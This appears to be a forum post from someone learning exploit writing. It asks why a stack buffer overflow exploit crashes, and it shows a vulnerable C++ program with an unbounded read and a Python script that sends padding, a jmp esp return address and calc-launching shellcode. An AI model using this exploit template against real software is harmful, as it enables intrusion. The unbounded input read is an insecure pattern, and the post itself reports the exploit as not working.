I am in the process of writing my first ever buffer overflow exploit for training purposes but I can’t seem to figure it out and my exploits only crash with out any useful output so I am asking for your help.
// the compiled executable is called exec.exe
#include <iostream>
using namespace std;
int main()
{
char buff[256];
cin >> buff;
cout << buff;
return 0;
}
this code takes a user input and writes it to the buffer allocated by the program as far as I know,
now I figured out the offset to be 268 that’s 256 +12, using Immunity debugger I found to jmp esp addresses and tried using them as the EIP (return address in the exploit code )
from subprocess import *
import struct
p = Popen(['exec.exe'],stdout=PIPE,stdin=PIPE)
EIP = struct.pack("I", 0x6eb51e62)
pad = b"\x42"*145
shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
out_put = pad+EIP+shellcode
p.communicate(out_put)
the length of the out_put is 268
this shellcode opens a calculator
I tried to increase the padding but was not successful
